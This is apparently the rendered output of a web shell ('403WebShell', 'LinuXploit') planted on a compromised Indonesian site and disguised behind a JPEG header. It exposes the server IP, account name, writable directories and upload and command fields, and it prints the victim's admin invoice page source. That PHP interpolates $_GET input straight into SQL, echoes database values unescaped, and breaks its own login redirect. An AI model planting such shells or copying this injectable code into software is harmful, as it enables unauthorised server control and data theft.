JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 91.108.119.51  /  Your IP : 216.73.217.80
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/superadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/superadmin/tunggakan.php
<?php  include "header.php";
	// cek apakah yang mengakses halaman ini sudah login
	if($_SESSION['status']<>"login"){
		header("location:location:../login.php");
	}
?>

<!DOCTYPE html>
<html lang="en">

<head>

  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="">
  <meta name="author" content="">
<head>
    <title>IDI | List Kategori</title>
    <!-- Custom fonts for this template-->
  <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
  <link href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i" rel="stylesheet">

  <!-- Custom styles for this template-->
  <link href="css/sb-admin-2.min.css" rel="stylesheet">
  
  <!-- Custom styles for this page -->
  <link href="vendor/datatables/dataTables.bootstrap4.min.css" rel="stylesheet">
<style type="text/css">
<!--
-->

@import url(http://fonts.googleapis.com/css?family=Montserrat:400,700);

html{   
  background-size: cover;
  height:100%;
}

#feedback-page{
	text-align:center;
}

#form-main{
	width:100%;
	float:left;
	padding-top:0px;
}

#form-div {
	background-color:rgba(54, 162, 235, 0.2);
	padding-left:35px;
	padding-right:35px;
	padding-top:35px;
	padding-bottom:50px;
	width: 450px;
	float: left;
	left: 50%;
	position:;
  margin-top:30px;
	margin-left: 200px;
  -moz-border-radius: 7px;
  -webkit-border-radius: 7px;
}

.feedback-input {
	color:#3c3c3c;
	font-family: Helvetica, Arial, sans-serif;
  font-weight:500;
	font-size: 18px;
	border-radius: 0;
	line-height: 22px;
	background-color: #fbfbfb;
	padding: 13px 13px 13px 54px;
	margin-bottom: 10px;
	width:100%;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	-ms-box-sizing: border-box;
	box-sizing: border-box;
  border: 3px solid rgba(0,0,0,0);
}

.feedback-input:focus{
	background: #fff;
	box-shadow: 0;
	border: 3px solid #3498db;
	color: #3498db;
	outline: none;
  padding: 13px 13px 13px 54px;
}

.focused{
	color:#30aed6;
	border:#30aed6 solid 3px;
}

/* Icons ---------------------------------- */
#name{
	background-image: url(http://rexkirby.com/kirbyandson/images/name.svg);
	background-size: 30px 30px;
	background-position: 11px 8px;
	background-repeat: no-repeat;
}

#name:focus{
	background-image: url(http://rexkirby.com/kirbyandson/images/name.svg);
	background-size: 30px 30px;
	background-position: 8px 5px;
  background-position: 11px 8px;
	background-repeat: no-repeat;
}

#email{
	background-image: url(http://rexkirby.com/kirbyandson/images/email.svg);
	background-size: 30px 30px;
	background-position: 11px 8px;
	background-repeat: no-repeat;
}

#email:focus{
	background-image: url(http://rexkirby.com/kirbyandson/images/email.svg);
	background-size: 30px 30px;
  background-position: 11px 8px;
	background-repeat: no-repeat;
}

#comment{
	background-image: url(http://rexkirby.com/kirbyandson/images/comment.svg);
	background-size: 30px 30px;
	background-position: 11px 8px;
	background-repeat: no-repeat;
}

textarea {
    width: 100%;
    height: 150px;
    line-height: 150%;
    resize:vertical;
	padding: 10px;
}

input:hover, textarea:hover,
input:focus, textarea:focus {
	background-color:white;
}

#button-blue{
	font-family: 'Montserrat', Arial, Helvetica, sans-serif;
	float:left;
	width: 100%;
	border: #fbfbfb solid 4px;
	cursor:pointer;
	background-color: #3498db;
	color:white;
	font-size:24px;
	padding-top:22px;
	padding-bottom:22px;
	-webkit-transition: all 0.3s;
	-moz-transition: all 0.3s;
	transition: all 0.3s;
  margin-top:-4px;
  font-weight:700;
}

#button-blue:hover{
	background-color: rgba(0,0,0,0);
	color: #0493bd;
}
	
.submit:hover {
	color: #3498db;
}
	
.ease {
	width: 0px;
	height: 74px;
	background-color: #fbfbfb;
	-webkit-transition: .3s ease;
	-moz-transition: .3s ease;
	-o-transition: .3s ease;
	-ms-transition: .3s ease;
	transition: .3s ease;
}

.submit:hover .ease{
  width:100%;
  background-color:white;
}

@media only screen and (max-width: 580px) {
	#form-div{
		left: 3%;
		margin-right: 3%;
		width: 100%;
		margin-left: 0;
		padding-left: 3%;
		padding-right: 3%;
	}
</style>

<link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
		<script src="https://code.jquery.com/jquery-1.12.4.js"></script>
		<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
	 	<script>
	  		$( function() {
	    		$( "#datepicker" ).datepicker({ dateFormat: 'dd-mm-yy' });
	    		$( "#datepicker2" ).datepicker({ dateFormat: 'dd-mm-yy' });
	  		} );
	  	</script>
</head>

<body id="page-top">
<body>

<!-- Page Wrapper -->
  <div id="wrapper">
  	<?php include "sidebar.php"; ?>
    
    <!-- Content Wrapper -->
    <div id="content-wrapper" class="d-flex flex-column">

      <!-- Main Content -->
      <div id="content">
      
      <?php include "topbar.php";?>
  
      	<!-- Begin Page Content -->
        <div class="container-fluid">
          <!-- DataTales Example -->
          <div class="card shadow mb-4">
            <div class="card-header py-3">
              <h6 class="m-0 font-weight-bold text-primary">List Post</h6>
            </div>
            <div class="card-body">
              <div class="table-responsive">

 
<?php
$noreg = $_GET['noreg'];


$sqlEdit = mysqli_query($konek, "SELECT * FROM h_registrasi WHERE npm='$_GET[npm]'");
$e=mysqli_fetch_array($sqlEdit);
	$npm 		= $e['npm'];
	$tgl_reg 	= $e['tgl_reg'];
	$nmlead 	= $e['nmlead'];
    $alamat 	= $e['alamat'];
	   $nostr 	= $e['nostr'];
	      $mbstr 	= $e['mbstr'];
		     $ahli 	= $e['ahli'];
			    $tgliuran 	= $e['iuran'];
				
				
				$tglreg= $e['tgl_reg'];
			  $date = new DateTime($tglreg);
			  $treg = $date->format('d-m-Y');
			  
			   $tglcek= $e['tgl_cek'];
			  $date = new DateTime($tglcek);
			  $tcek = $date->format('d-m-Y');
			  
			  $tgl3    = date('Y-m-d', strtotime('+1825 days', strtotime($tgliuran)));
 			  $date = new DateTime($tgl3);
			  $tgl2 = $date->format('d-m-Y');
				  
			  $tglstr= $e['mbstr'];
			  $date = new DateTime($tglstr);
			  $mbstr = $date->format('d-m-Y');


$tglBayar 	= date('Y-m-d');

?>

  <div id="form-main">
  <div id="form-div">
   <form method="post" action="kirim_tung.php" enctype="multipart/form-data">
	  
      <p align="center">
        <label for="tbayar"><strong>Kirim Invoice <br>Jika ada Tunggakan Administrasi</strong></label>
      </p>
     
      </p>
      <p>
        <label for="tbayar">ID</label>
        <br>
        <input name="npm" readonly class="form-control"  value="<?php echo $e['npm']  ?>"  />
      </p>
	   <label for="tbayar">NOREG</label>
	  <br>
        <input name="noreg" readonly class="form-control"  value="<?php echo $e['noreg']  ?>"  />
      </p>
      <label for="ket">Tanggal Invoice</label>
         <input name="tglinv" class="form-control" readonly  type="text" id="datepicker" value="<?php echo $tglBayar  ?>" size="11">
      </p> 
	  
 	<label for="tbayar">Nama</label>
 	<br>
      <p class="name"><input name="nmlead" readonly  placeholder="Isi Nama" class="form-control"  value="<?php echo $nmlead  ?>"  />
      </p>	

 <label for="jumlah">Alamat</label>
	  <br>
        <input name="alamat" type="text" readonly  class="form-control"   placeholder="Isi Alamat" maxlength="30" value="<?php echo $alamat  ?>" />
      </p>
	  
 		</p>No STR <br>
        <input name="nostr" type="text"  readonly class="form-control"    placeholder="Isi No STR" maxlength="30" value="<?php echo $nostr  ?>"/>
      </p>
</p>Masa berlaku STR <br>
        <input name="mbstr" type="text"  readonly class="form-control"    placeholder="Isi No STR" maxlength="30" value="<?php echo $mbstr  ?>"/>
      </p>
	  
      <label for="jumlah"class="merah">Jenis Transaksi </label>
      <br>
    
	  <textarea name="transaksi" class="" id="transaksi" placeholder="Isi Jenis transaksi" ></textarea>

      </p> 
	  
  
	 

	    <label for="jumlah"class="merah">Nominal </label>
      <br>
	   <input name="nominal" class="form-control"  type="number"   placeholder="Isi nominal" type="text" value="" size="11">
      </p>

	  	  	  <label for="keterangan">Note</label>
      
		<textarea name="note" class="" id="note" placeholder="Isi Keterangan" ></textarea>

      </p> 


</p>
        <p>&nbsp;          </p>
        <div class="submit">
        <input type="submit"   id="button-blue" value="Submit" />
        <div class="ease"></div>
      </div>
    </form>
  </div>

<!-- proses edit data -->
<?php
//if($_SERVER['REQUEST_METHOD']=='POST'){
//
//	//variabel untuk menampung inputan dari form
//	$npm 	    = $_POST['npm'];
//	$noreg	    = $_POST['noreg'];
//	$ket	    = $_POST['note'];
//	$status     = $_POST['status'];
//	$nmlead 	= $_POST['nmlead'];
//    $alamat 	= $_POST['alamat'];
//	$nostr   	= $_POST['nostr'];
//	$tglinv 	= $_POST['tglinv'];
//    $tingkat 	= $_POST['nominal'];
//	$tglexp 	= $_POST['tglexp']; 
//	$iuran 	    = $_POST['iuran'];  
//		
//		
//		
//					$sqlKelas = mysqli_query($konek, "select * from level where tingkat='$tingkat'");
//					while($k=mysqli_fetch_array($sqlKelas)){
//					$nominal= $k['nominal'];
//					}
//	          
//		
//		
//		
//		    
//	$day = 'INV';
//  
//   $dayList = array(
//    'INV' => 'INV',
//    'AGD' => 'AGD',
//    'Allegria' => 'ALG'
//	);
//	
//$query = mysqli_query($konek, "SELECT max(noinv) as kodeTerbesar FROM b_inv  ");
//$data = mysqli_fetch_array($query);
//$kodeBarang = $data['kodeTerbesar'];
//
// 
// 
//// mengambil angka dari kode barang terbesar, menggunakan fungsi substr
//// dan diubah ke integer dengan (int)
//$urutan = (int) substr($kodeBarang, -3, 3);
// 
//// bilangan yang diambil ini ditambah 1 untuk menentukan nomor urut berikutnya
//$urutan++;
// 
//// membentuk kode barang baru
//// perintah sprintf("%03s", $urutan); berguna untuk membuat string menjadi 3 karakter
//// misalnya perintah sprintf("%03s", 15); maka akan menghasilkan '015'
//// angka yang diambil tadi digabungkan dengan kode huruf yang kita inginkan, misalnya BRG 
//
//
////$huruf = substr("$project",0, 3);
//$huruf =  $dayList[$day];
//
//$kodeid= $huruf . sprintf("%03s", $urutan);
//	
//	
//
//	   
//
//									//$update = mysqli_query($konek, "UPDATE h_registrasi SET lunas='proses',tgliuran='$tgliuran',nominal='$nominal' WHERE npm='$npm'");	
//									$update = mysqli_query($konek, "UPDATE h_registrasi SET noinv='$kodeid',tgliuran='$iuran',pinv='tagihan',nominal='$nominal' WHERE npm='$npm' AND noreg='$noreg'");	
//
//																	
//									mysqli_query($konek, "INSERT INTO b_inv(npm,noreg,noinv,tglinv,nmlead,tglexp,tgliuran,alamat,nostr,nominal,status,keterangan,level)
//											             values('$npm','$noreg','$kodeid','$tglinv','$nmlead','$tglexp','$iuran','$alamat','$nostr','$nominal','tagihan','$ket','$tingkat')");
//														 
//														 header("location:upd_sip2.php?npm=$npm&noreg=$noreg");
//														 
//														 
//							
//	 }
//
//		
?>
 </div>
		<?php include "footer.php";?>
		
<!-- proses edit data -->

    </div>
   <!-- Bootstrap core JavaScript-->
  <script src="vendor/jquery/jquery.min.js"></script>
  <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>

  <!-- Core plugin JavaScript-->
  <script src="vendor/jquery-easing/jquery.easing.min.js"></script>

  <!-- Custom scripts for all pages-->
  <script src="js/sb-admin-2.min.js"></script>

  <!-- Page level plugins -->
  <script src="vendor/datatables/jquery.dataTables.min.js"></script>
  <script src="vendor/datatables/dataTables.bootstrap4.min.js"></script>

  <!-- Page level custom scripts -->
  <script src="js/demo/datatables-demo.js"></script>
</div>	
	

	</div>
</div>
</div>	
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit